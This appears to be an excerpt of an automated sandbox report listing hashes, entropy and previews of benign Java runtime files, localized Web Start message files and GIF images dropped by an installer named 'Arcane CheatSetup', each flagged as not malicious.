                                Entropy (8bit):7.951223313727943
                                Encrypted:false
                                SSDEEP:49152:ABSxAmHHJwEu4l3Dyz7oQHeNHJJ2aAvfZc:ABEtHHaEuI3Dy3oQH2pFAvW
                                MD5:2388C4C8D5F95E0379A8997C7C2492F4
                                SHA1:906BF87EB1D8881ABADBF93A3C4BBA7887CA2A01
                                SHA-256:A1FD508EACF76645EB0885B243B5DD14239F1E039E8B53ED038226DF91A30539
                                SHA-512:2CCE11A5F97DF842964B55408FCF1EC84C0CD561E664ABA3A51275EAFE59D7C920FCFD954C527DA4D53ACB191200CC64BF8150A33BCB9B038F36ADB2CC69B1A1
                                Malicious:false
                                Preview:PK...........H................META-INF/....PK...........H...7Z...e.......META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.C.q,HL.HU...%...y...R.KRSt.*...L....u....4....sR......K..5y.x..PK...........H................com/PK...........H................com/oracle/PK...........H................com/oracle/deploy/PK...........H................com/oracle/deploy/update/PK...........H................com/sun/PK...........H................com/sun/applet2/PK...........H................com/sun/applet2/preloader/PK...........H............ ...com/sun/applet2/preloader/event/PK...........H................com/sun/deploy/PK...........H................com/sun/deploy/appcontext/PK...........H................com/sun/deploy/association/PK...........H............#...com/sun/deploy/association/utility/PK...........H................com/sun/deploy/cache/PK...........H................com/sun/deploy/config/PK...........H................com/sun/deploy/jardiff/PK...........H................com/sun/deploy/model/PK.....
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                Category:dropped
                                Size (bytes):14156
                                Entropy (8bit):5.649187440261259
                                Encrypted:false
                                SSDEEP:48:E84SHTDIbZI+R9ufdITe3MPu20DguN9P5YOinvYrJJ0JKP/U8HtK8NJO8lJi8VJb:kld6uQZ9P5dTC7IjZUkPmpaemFqKs8n
                                MD5:91052ADB799AEF68EA76931997C40CE4
                                SHA1:19255B8E335C22A171C26148099191708C99EE7A
                                SHA-256:61D1382375238F90E2E4EE2AF985D978F1409E01B38080E710DF4ACB2897E63B
                                SHA-512:39BAA49A1CEF533E5D3FFF1A86BC72CB346A6BF1928A9D8B505EBA09A4AB1506400234DE78BDFD925821F0A690B8887BD004A18CC64337DEB666CC2509DEE5DA
                                Malicious:false
                                Preview:PK........$..H............'...{CAFEEFAC-0018-0000-0101-ABCDEFFEDCBA}/UT....GjW.GjWux.............PK........#..H................{CAFEEFAC-0018-0000-0101-ABCDEFFEDCBA}/chrome/UT....GjW.GjWux.............PK........#..H............6...{CAFEEFAC-0018-0000-0101-ABCDEFFEDCBA}/chrome/content/UT....GjW.GjWux.............PK........#..H............>...{CAFEEFAC-0018-0000-0101-ABCDEFFEDCBA}/chrome/content/ffjcext/UT....GjW.GjWux.............PK........#..H...V........H...{CAFEEFAC-0018-0000-0101-ABCDEFFEDCBA}/chrome/content/ffjcext/ffjcext.jsUT....GjW.GjWux.............const gJavaConsole1_8_0_101 = {...id.: "javaconsole1.8.0_101",...mimeType: "application/x-java-applet;jpi-version=1.8.0_101",...install.: function() {...window.addEventListener("load",this.init,false);..},...init.: function() { ...if (navigator.mimeTypes[gJavaConsole1_8_0_101.mimeType]) {....var toolsPopup = document.getElementById("menu_ToolsPopup");.....toolsPopup.addEventListener("popupshowing",gJavaConsole1_8_0_101.enable,false)
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (1575), with CRLF line terminators
                                Category:dropped
                                Size (bytes):3441
                                Entropy (8bit):4.832330268062187
                                Encrypted:false
                                SSDEEP:48:KE2CXpRLJDNXQC6tNaEGBlu9hUv5//zEvDiwkISAyHgKe1p6KF/uoYuh1LNRtS0f:KERXlp6tN1VHq1Kt1S4x8Xi
                                MD5:FFE3CC16616314296C3262B0A0E093CD
                                SHA1:198DD1C6E6707C10AE74A1C42E8A91C429598F3B
                                SHA-256:3941736BEF6A8E53D002B6B67ECE4793C2F3F34BCC1ECB271684EB3F73FC4103
                                SHA-512:CD3A9329F405CA14E11CDBB74D467B31A31530CBF00537B16FB23AEBC6C07EB268E9624FDBC997AA0CF4852DAC288E1D011E2FC392D71E25DBDF52E359BA9D4E
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2011, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=erreur interne, message inconnu..error.badinst.nojre=Installation incorrecte. JRE introuvable dans le fichier de configuration..error.launch.execv=Erreur lors de l'appel de Java Web Start (execv)..error.launch.sysexec=Erreur lors de l'appel de Java Web Start (SysExec) ..error.listener.failed=Accueil : \u00E9chec de sysCreateListenerSocket..error.accept.failed=Accueil : \u00E9chec d'accept..error.recv.failed=Accueil : \u00E9chec de recv..error.invalid.port=Accueil : impossible de r\u00E9activer un port valide..error.read=Lecture apr\u00E8s la fin de tampon..error.xmlparsing=Erreur d'analyse XML : type incorrect de jeton..error.splash.exit=Le processus d'affichage de l'\u00E9cran d'accueil de Java Web Start est en cours de fermeture...\n..# "Last WinSock Error" means the error message for the last operation that
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 320 x 139
                                Category:dropped
                                Size (bytes):8590
                                Entropy (8bit):7.910688771816331
                                Encrypted:false
                                SSDEEP:192:91m4OqvVyG+LMIcBc2qPjHmxJCCG/h97dIYhOX:9/OqdivcqzjH3tfDE
                                MD5:249053609EAF5B17DDD42149FC24C469
                                SHA1:20E7AEC75F6D036D504277542E507EB7DC24AAE8
                                SHA-256:113B01304EBBF3CC729A5CA3452DDA2093BD8B3DDC2BA29E5E1C1605661F90BE
                                SHA-512:9C04A20E2FA70E4BCFAC729E366A0802F6F5167EA49475C2157C8E2741C4E4B8452D14C75F67906359C12F1514F9FB7E9AF8E736392AC8434F0A5811F7DDE0CB
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                Category:dropped
                                Size (bytes):14156
                                Entropy (8bit):5.649187440261259
                                Encrypted:false
                                SSDEEP:48:E84SHTDIbZI+R9ufdITe3MPu20DguN9P5YOinvYrJJ0JKP/U8HtK8NJO8lJi8VJb:kld6uQZ9P5dTC7IjZUkPmpaemFqKs8n
                                MD5:91052ADB799AEF68EA76931997C40CE4
                                SHA1:19255B8E335C22A171C26148099191708C99EE7A
                                SHA-256:61D1382375238F90E2E4EE2AF985D978F1409E01B38080E710DF4ACB2897E63B
                                SHA-512:39BAA49A1CEF533E5D3FFF1A86BC72CB346A6BF1928A9D8B505EBA09A4AB1506400234DE78BDFD925821F0A690B8887BD004A18CC64337DEB666CC2509DEE5DA
                                Malicious:false
                                Preview:PK........$..H............'...{CAFEEFAC-0018-0000-0101-ABCDEFFEDCBA}/UT....GjW.GjWux.............PK........#..H................{CAFEEFAC-0018-0000-0101-ABCDEFFEDCBA}/chrome/UT....GjW.GjWux.............PK........#..H............6...{CAFEEFAC-0018-0000-0101-ABCDEFFEDCBA}/chrome/content/UT....GjW.GjWux.............PK........#..H............>...{CAFEEFAC-0018-0000-0101-ABCDEFFEDCBA}/chrome/content/ffjcext/UT....GjW.GjWux.............PK........#..H...V........H...{CAFEEFAC-0018-0000-0101-ABCDEFFEDCBA}/chrome/content/ffjcext/ffjcext.jsUT....GjW.GjWux.............const gJavaConsole1_8_0_101 = {...id.: "javaconsole1.8.0_101",...mimeType: "application/x-java-applet;jpi-version=1.8.0_101",...install.: function() {...window.addEventListener("load",this.init,false);..},...init.: function() { ...if (navigator.mimeTypes[gJavaConsole1_8_0_101.mimeType]) {....var toolsPopup = document.getElementById("menu_ToolsPopup");.....toolsPopup.addEventListener("popupshowing",gJavaConsole1_8_0_101.enable,false)
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):2917
                                Entropy (8bit):4.838706790124659
                                Encrypted:false
                                SSDEEP:48:KaDMJ9TmsHDmDDCDP2un8YzgKe1E13Tstub22tTeF/Qi/WRtAXikTzgaENZzT3JI:KaD+9TmAe29vBotubbt2Oz+ENlbJI
                                MD5:2EB9117D147BAA0578E4000DA9B29E12
                                SHA1:3D297ECF3D280D4AA3D1423E885994495243F326
                                SHA-256:B8D9C69FF7F4832A9B365D4A43CF66DFF9847051752B13EEDF024CAA9C1EF46B
                                SHA-512:C3F7730767941B3C8F6F53D4686E9F898D1907D978F6D1FA35BA02C3FCD8306335406A5F9ABAA844F27F7AFD9E548810BECB9EC3E6B84888EA5EAC57B6ED6FDB
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2011, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=internal error, unknown message..error.badinst.nojre=Bad installation. No JRE found in configuration file..error.launch.execv=Error encountered while invoking Java Web Start (execv)..error.launch.sysexec=Error encountered while invoking Java Web Start (SysExec) ..error.listener.failed=Splash: sysCreateListenerSocket failed..error.accept.failed=Splash: accept failed..error.recv.failed=Splash: recv failed..error.invalid.port=Splash: didn't revive a valid port..error.read=Read past end of buffer..error.xmlparsing=XML Parsing error: wrong kind of token found..error.splash.exit=Java Web Start splash screen process exiting .....\n..# "Last WinSock Error" means the error message for the last operation that failed...error.winsock=\tLast WinSock Error: ..error.winsock.load=Couldn't load winsock.dll..error.winsock.start
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (1386), with CRLF line terminators
                                Category:dropped
                                Size (bytes):3441
                                Entropy (8bit):4.927824210480987
                                Encrypted:false
                                SSDEEP:96:KYD1QNsQZ/lmo8ZuLgdBGpv3JRJ/7coh91XlK7Q/vm2QAfO:9D1+sCmapce1KGm2QIO
                                MD5:81BBDEA4DC9803A6EB78CE7D5CA018ED
                                SHA1:9AAF012276AD89CE7273CF5F0BE4C95B72D906AB
                                SHA-256:565B8FF1F31784378884D9D7468FFDFDDA5B001ACB5BB393A5006AC19BE4E67A
                                SHA-512:310017DD27C91C492188737494DA04CAB241D0BF4E91326AFB4A3F98CBFF78A6C0BBC14EC7E883597E9D506FAA80BA4E9A25B5F46BFD2543850323061E829A84
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2011, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=internt fel, ok\u00E4nt meddelande..error.badinst.nojre=Felaktig installation. Ingen JRE har hittats i konfigurationsfilen..error.launch.execv=Ett fel intr\u00E4ffade under starten av Java Web Start (execv)..error.launch.sysexec=Ett fel intr\u00E4ffade under starten av Java Web Start (SysExec) ..error.listener.failed=V\u00E4lkomstsk\u00E4rm: sysCreateListenerSocket utf\u00F6rdes inte..error.accept.failed=V\u00E4lkomstsk\u00E4rm: kunde inte accepteras..error.recv.failed=V\u00E4lkomstsk\u00E4rm: kunde inte mottaga..error.invalid.port=V\u00E4lkomstsk\u00E4rm: \u00E5terskapade inte en giltig port..error.read=L\u00E4ste f\u00F6rbi slutet av bufferten..error.xmlparsing=XML-tolkningsfel: fel typ av igenk\u00E4nningstecken hittades..error.splash.exit=Java Web Start - v\u00E4lkomstsk\u00E4rmen avslutas .....\n..# "Last
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (2601), with CRLF line terminators
                                Category:dropped
                                Size (bytes):5744
                                Entropy (8bit):4.781504394194986
                                Encrypted:false
                                SSDEEP:96:GhymCk3kjLqgz9RkfrsEW/p9M32i0HkZr+ywc8b8+/moD7yct070DL70Dm:Dm5kLfIErMbT/44in
                                MD5:64DE22212EE92F29BCA3ACED72737254
                                SHA1:C4DBC247043578CCF9CD8DAB652D096703D5B26E
                                SHA-256:292696C94D5FD0BF2FF4AF9E4D363BFCBE888D2E65BD18A20CF71081FB1C9B0D
                                SHA-512:CA33C75B66D8B5316B1C3ED41A9A14DD8611A3BB9B26EFDC7F468250696D515CF1E966831975C9ABDC33E9A1C59167FE79BA547592D2A04997E1342433E7B628
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2016, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=\uB0B4\uBD80 \uC624\uB958\uAC00 \uBC1C\uC0DD\uD588\uC2B5\uB2C8\uB2E4. \uC54C \uC218 \uC5C6\uB294 \uBA54\uC2DC\uC9C0\uC785\uB2C8\uB2E4...error.badinst.nojre=\uC124\uCE58\uAC00 \uC798\uBABB\uB418\uC5C8\uC2B5\uB2C8\uB2E4. \uAD6C\uC131 \uD30C\uC77C\uC5D0\uC11C JRE\uB97C \uCC3E\uC744 \uC218 \uC5C6\uC2B5\uB2C8\uB2E4...error.launch.execv=Java Web Start(execv)\uB97C \uD638\uCD9C\uD558\uB294 \uC911 \uC624\uB958\uAC00 \uBC1C\uC0DD\uD588\uC2B5\uB2C8\uB2E4...error.launch.sysexec=Java Web Start(SysExec)\uB97C \uD638\uCD9C\uD558\uB294 \uC911 \uC624\uB958\uAC00 \uBC1C\uC0DD\uD588\uC2B5\uB2C8\uB2E4. ..error.listener.failed=\uC2A4\uD50C\uB798\uC2DC: sysCreateListenerSocket\uC744 \uC2E4\uD328\uD588\uC2B5\uB2C8\uB2E4...error.accept.failed=\uC2A4\uD50C\uB798\uC2DC: \uC2B9\uC778\uC744 \uC2E4\uD328\uD588\uC2B5\uB2C8\uB2E4...error.r
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (2924), with CRLF line terminators
                                Category:dropped
                                Size (bytes):6381
                                Entropy (8bit):4.5983590678211135
                                Encrypted:false
                                SSDEEP:96:Mu7cepcgD8do+O2D+k8/RJFGQcHGqo72hzEflA44CAmIbIC3j5pN/o8woJe:PctgYqhTYzG2O
                                MD5:D830FC76BDD1975010ECE4C5369DADF8
                                SHA1:D8CC3F54325142EFA740026E2BC623AFE6F3ACB5
                                SHA-256:11E886336BA51A9044AB1A87C60CEEE34C29BB724E06A16968D31531A7001064
                                SHA-512:7B867A50A811FBD7FFDAD0B729CA4501E16386EE5C4940A4CF9A805767CC0D10F7E3BDFD6A60204D79292D778D93E3BD915368AC0E9453BBB1010ADFD9655F0F
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=\u5185\u90E8\u30A8\u30E9\u30FC\u3001\u4E0D\u660E\u306A\u30E1\u30C3\u30BB\u30FC\u30B8..error.badinst.nojre=\u30A4\u30F3\u30B9\u30C8\u30FC\u30EB\u304C\u6B63\u3057\u304F\u3042\u308A\u307E\u305B\u3093\u3002\u69CB\u6210\u30D5\u30A1\u30A4\u30EB\u5185\u306BJRE\u304C\u3042\u308A\u307E\u305B\u3093..error.launch.execv=Java Web Start\u306E\u547C\u51FA\u3057\u4E2D\u306B\u30A8\u30E9\u30FC\u304C\u767A\u751F\u3057\u307E\u3057\u305F(execv)..error.launch.sysexec=Java Web Start\u306E\u547C\u51FA\u3057\u4E2D\u306B\u30A8\u30E9\u30FC\u304C\u767A\u751F\u3057\u307E\u3057\u305F(SysExec) ..error.listener.failed=\u30B9\u30D7\u30E9\u30C3\u30B7\u30E5: sysCreateListenerSocket\u306B\u5931\u6557\u3057\u307E\u3057\u305F..error.accept.failed=\u30B9\u30D7\u30E9\u30C3\u30B7\u30E5: accept\u306B\u5931\u6557\u3057\u307E\u3057\u305F..error.recv.fai
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (1392), with CRLF line terminators
                                Category:dropped
                                Size (bytes):3255
                                Entropy (8bit):4.7050139579578145
                                Encrypted:false
                                SSDEEP:48:KTi+qOaVUVVMsD/B0FN5+eADELDHxhdpHgKe1uo265eLaqMQ6URhmwgFs+ur60:KJBa2VtzeDLDRhd5A26+7RhZgR0
                                MD5:BF5E5310B2DCF8E8B3697B358AD4446D
                                SHA1:C746AC1F46F607FA8F971BEA2B6853746A4FB28D
                                SHA-256:CC9AD73957535011EE2376C23DE2C2597F877ACEBA9173E822EE79AAD3C4E9E6
                                SHA-512:B6C61D38B0ACC427B9B2F4C19DABD7EACBE8EEA6B973FD31B3555C4C5B3FFAF1CA036B730359346F57223B44CCE79E04A6D06BBC13C6F7DD26ED463776BB6DCC
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2011, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=errore interno, messaggio sconosciuto..error.badinst.nojre=Installazione errata. Impossibile trovare il JRE nel file di configurazione..error.launch.execv=Errore durante la chiamata di Java Web Start (execv)..error.launch.sysexec=Errore durante la chiamata di Java Web Start (SysExec) ..error.listener.failed=Apertura: sysCreateListenerSocket non riuscito..error.accept.failed=Apertura: accept non riuscito..error.recv.failed=Apertura: recv non riuscito..error.invalid.port=Apertura: impossibile identificare una porta valida..error.read=Tentativo di lettura dopo la fine del buffer..error.xmlparsing=Errore durante l'analisi XML: trovato un tipo di token errato..error.splash.exit=Uscita dal processo di schermata iniziale di Java Web Start in corso...\n..# "Last WinSock Error" means the error message for the last oper
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 640 x 278
                                Category:dropped
                                Size (bytes):12250
                                Entropy (8bit):7.901446927123525
                                Encrypted:false
                                SSDEEP:192:Zzv4QPei/ueMFJ2M4xSGb/xGEyddpTa7Kv9I1BDc3KR3q6xmwJePYueHjAPZKGMr:5vTWvmxSGbkpTaYe1dc3KR3q7wJsOHmu
                                MD5:3FE2013854A5BDAA488A6D7208D5DDD3
                                SHA1:D2BFF9BBF7920CA743B81A0EE23B0719B4D057CA
                                SHA-256:FC39D09D187739E580E47569556DE0D19AF28B53DF5372C7E0538FD26EDB7988
                                SHA-512:E3048E8E0C22F6B200E5275477309083AA0435C0F33D1994C10CE65A52F357EE7CF7081F85C00876F438DFA1EE59B542D602287EC02EA340BFDF90C0C6ABD548
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (1729), with CRLF line terminators
                                Category:dropped
                                Size (bytes):3784
                                Entropy (8bit):5.17620120701776
                                Encrypted:false
                                SSDEEP:96:wMWzQq8x9i7zO/JOFtUtQzy+gawZFomWdYQCfQ/ydQCyA:LWzQqms7S/JDtQcJoHWQaQ/6QCH
                                MD5:4287D97616F708E0A258BE0141504BEB
                                SHA1:5D2110CABBBC0F83A89AEC60A6B37F5F5AD3163E
                                SHA-256:479DC754BD7BFF2C9C35D2E308B138EEF2A1A94CF4F0FC6CCD529DF02C877DC7
                                SHA-512:F273F8D501C5D29422257733624B5193234635BD24B444874E38D8D823D728D935B176579D5D1203451C0CE377C57ED7EB3A9CE9ADCB3BB591024C3B7EE78DCD
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=\u5167\u90E8\u932F\u8AA4\uFF0C\u4E0D\u660E\u7684\u8A0A\u606F..error.badinst.nojre=\u5B89\u88DD\u932F\u8AA4\u3002\u5728\u7D44\u614B\u6A94\u4E2D\u627E\u4E0D\u5230 JRE..error.launch.execv=\u547C\u53EB Java Web Start (execv) \u6642\u9047\u5230\u932F\u8AA4..error.launch.sysexec=\u547C\u53EB Java Web Start (SysExec) \u6642\u9047\u5230\u932F\u8AA4..error.listener.failed=Splash: sysCreateListenerSocket \u5931\u6557..error.accept.failed=Splash: \u63A5\u53D7\u5931\u6557..error.recv.failed=Splash: recv \u5931\u6557..error.invalid.port=Splash: \u6709\u6548\u7684\u9023\u63A5\u57E0\u5C1A\u672A\u56DE\u5FA9..error.read=\u8B80\u53D6\u8D85\u51FA\u7DE9\u885D\u5340\u7D50\u5C3E..error.xmlparsing=XML \u5256\u6790\u932F\u8AA4: \u627E\u5230\u932F\u8AA4\u7684\u8A18\u865F\u7A2E\u985E..error.splash.exit=Java Web Start \u9583\u73FE\u87A2
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 320 x 139
                                Category:dropped
                                Size (bytes):7805
                                Entropy (8bit):7.877495465139721
                                Encrypted:false
                                SSDEEP:96:S88k2wenvMs3iHrSI3yy73VWOcaJpGvrrXqJBcqgbf5bD0jmzDBoqCN2IWsyh:SFHhs73n73V4airrXq41Ll3vBmN2YU
                                MD5:9E8F541E6CEBA93C12D272840CC555F8
                                SHA1:8DEF364E07F40142822DF84B5BB4F50846CB5E4E
                                SHA-256:C5578AC349105DE51C1E9109D22C7843AAB525C951E312700C73D5FD427281B9
                                SHA-512:2AB06CAE68DEC9D92B66288466F24CC25505AF954FA038748D6F294D1CFFB72FCC7C07BA8928001D6C487D1BF71FE0AF1B1AA0F35120E5F6B1B2C209BA596CE2
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (1857), with CRLF line terminators
                                Category:dropped
                                Size (bytes):4104
                                Entropy (8bit):5.04197285715923
                                Encrypted:false
                                SSDEEP:96:Me7R8zl0Zf4z3X4Gv2hEpeStEKADydYL1WfK0eSm91j7:1R8pOfWHJvOJT1WPtK1j7
                                MD5:823D1F655440C3912DD1F965A23363FC
                                SHA1:50B941A38B9C5F565F893E1E0824F7619F51185C
                                SHA-256:86663DED105B77261C0556468A93BC8666A094B918299A61AF0A8E30F42019C7
                                SHA-512:1EBF989D2121CF05FFC912B9B228C4D4523763EB1A689EC74568D811C88DCF11032FFC8007BB24DAF7D079B580662B77D94B4B8D71A2E891EF27979FF32CD727
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=\u5185\u90E8\u9519\u8BEF, \u672A\u77E5\u6D88\u606F..error.badinst.nojre=\u9519\u8BEF\u5B89\u88C5\u3002\u914D\u7F6E\u6587\u4EF6\u4E2D\u627E\u4E0D\u5230 JRE..error.launch.execv=\u8C03\u7528 Java Web Start (execv) \u65F6\u9047\u5230\u9519\u8BEF..error.launch.sysexec=\u8C03\u7528 Java Web Start (SysExec) \u65F6\u9047\u5230\u9519\u8BEF..error.listener.failed=\u542F\u52A8\u5C4F\u5E55: sysCreateListenerSocket \u5931\u8D25..error.accept.failed=\u542F\u52A8\u5C4F\u5E55: \u63A5\u53D7\u5931\u8D25..error.recv.failed=\u542F\u52A8\u5C4F\u5E55: recv \u5931\u8D25..error.invalid.port=\u542F\u52A8\u5C4F\u5E55: \u672A\u6062\u590D\u6709\u6548\u7AEF\u53E3..error.read=\u8BFB\u53D6\u8D85\u51FA\u7F13\u51B2\u533A\u7ED3\u5C3E..error.xmlparsing=XML \u89E3\u6790\u9519\u8BEF: \u53D1\u73B0\u9519\u8BEF\u7684\u6807\u8BB0\u7C7B\u578B..error.s
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 640 x 278
                                Category:dropped
                                Size (bytes):15276
                                Entropy (8bit):7.949850025334252
                                Encrypted:false
                                SSDEEP:192:onqkbSDLFgIBL0IgyZCE/oIuuemXclVO/HemZ8GbRdziHm6tIclW3ZYvvebtssZn:lKMLWkpgy8sdsnOmEyPLaYoauAdI
                                MD5:CB81FED291361D1DD745202659857B1B
                                SHA1:0AE4A5BDA2A6D628FAC51462390B503C99509FDC
                                SHA-256:9DD5CCD6BDFDAAD38F7D05A14661108E629FDD207FC7776268B566F7941E1435
                                SHA-512:4A383107AC2D642F4EB63EE7E7E85A8E2F63C67B41CA55EBAE56B52CECFE8A301AAF14E6536553CBC3651519DB5C10FC66588C84C9840D496F5AE980EF2ED2B9
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (1729), with CRLF line terminators
                                Category:dropped
                                Size (bytes):3784
                                Entropy (8bit):5.17620120701776
                                Encrypted:false
                                SSDEEP:96:wMWzQq8x9i7zO/JOFtUtQzy+gawZFomWdYQCfQ/ydQCyA:LWzQqms7S/JDtQcJoHWQaQ/6QCH
                                MD5:4287D97616F708E0A258BE0141504BEB
                                SHA1:5D2110CABBBC0F83A89AEC60A6B37F5F5AD3163E
                                SHA-256:479DC754BD7BFF2C9C35D2E308B138EEF2A1A94CF4F0FC6CCD529DF02C877DC7
                                SHA-512:F273F8D501C5D29422257733624B5193234635BD24B444874E38D8D823D728D935B176579D5D1203451C0CE377C57ED7EB3A9CE9ADCB3BB591024C3B7EE78DCD
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=\u5167\u90E8\u932F\u8AA4\uFF0C\u4E0D\u660E\u7684\u8A0A\u606F..error.badinst.nojre=\u5B89\u88DD\u932F\u8AA4\u3002\u5728\u7D44\u614B\u6A94\u4E2D\u627E\u4E0D\u5230 JRE..error.launch.execv=\u547C\u53EB Java Web Start (execv) \u6642\u9047\u5230\u932F\u8AA4..error.launch.sysexec=\u547C\u53EB Java Web Start (SysExec) \u6642\u9047\u5230\u932F\u8AA4..error.listener.failed=Splash: sysCreateListenerSocket \u5931\u6557..error.accept.failed=Splash: \u63A5\u53D7\u5931\u6557..error.recv.failed=Splash: recv \u5931\u6557..error.invalid.port=Splash: \u6709\u6548\u7684\u9023\u63A5\u57E0\u5C1A\u672A\u56DE\u5FA9..error.read=\u8B80\u53D6\u8D85\u51FA\u7DE9\u885D\u5340\u7D50\u5C3E..error.xmlparsing=XML \u5256\u6790\u932F\u8AA4: \u627E\u5230\u932F\u8AA4\u7684\u8A18\u865F\u7A2E\u985E..error.splash.exit=Java Web Start \u9583\u73FE\u87A2
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (1345), with CRLF line terminators
                                Category:dropped
                                Size (bytes):3338
                                Entropy (8bit):4.919780187496773
                                Encrypted:false
                                SSDEEP:48:WvaqyL1nlrDtzh5+VN9JrnjXyv6jq/YgKe1h/KZkCUdr5pAvA1t2CPTOsdIamy:txrj5Snk6+wuir25pAvAv2ITOsd9
                                MD5:FF9CFEE1ACFCD927253A6E35673F1BB7
                                SHA1:957E6609A1AF6D06A45A6F7B278BE7625807B909
                                SHA-256:E130FBD5FA378A380F46F42981F2C97BC152059C27120204AB4DA47079D31513
                                SHA-512:F42601092436D7AF30CCD81126185232D9D643B195D3D4619AEC451E3E2A60E33E6378E770DD1A4CDF7AB20CB749371665A992CA73D2842A7102F3FB34B6B9EB
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=interner Fehler, unbekannte Meldung..error.badinst.nojre=Ung\u00FCltige Installation. Keine JRE in Konfigurationsdatei gefunden..error.launch.execv=Fehler beim Aufrufen von Java Web Start (execv) aufgetreten..error.launch.sysexec=Fehler beim Aufrufen von Java Web Start (SysExec) aufgetreten..error.listener.failed=Startbildschirm: sysCreateListenerSocket nicht erfolgreich..error.accept.failed=Startbildschirm: accept nicht erfolgreich..error.recv.failed=Startbildschirm: recv nicht erfolgreich..error.invalid.port=Startbildschirm: Reaktivierung eines g\u00FCltigen Ports nicht m\u00F6glich..error.read=\u00DCber Pufferende hinaus gelesen..error.xmlparsing=XML-Parsefehler: Falscher Tokentyp gefunden..error.splash.exit=Prozess f\u00FCr Startbildschirm von Java Web Start wird beendet.....\n..# "Last WinSock Error" mean
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (1319), with CRLF line terminators
                                Category:dropped
                                Size (bytes):3317
                                Entropy (8bit):4.869662880084367
                                Encrypted:false
                                SSDEEP:48:3c6BeKTDcUsLYg9tStwmx+supWBxKy0HgKe1u6K0NCMc6MTNTjtA7NZdlw7ZHAW:3c6fbEf1mxPuUBxKy4va+mZdlw7Z7
                                MD5:4078691AB22C4F0664856BE0C024A52F
                                SHA1:6247FC05DE429F65DC4E1356C4715DC51F43B98F
                                SHA-256:6869B27B12B99C9D169B3E018284BE0F7631DBDF2DDD5F4EA5B1A458736FDFDF
                                SHA-512:BB02765F69E23C732C790EB994800C83BB8EFE7FF8CE0BCDC475EC5A29CEF5A33A5513AB1A7DC9F0F066B807A0980C41EC0037710873A32BD2952DBED79D24CA
                                Malicious:false
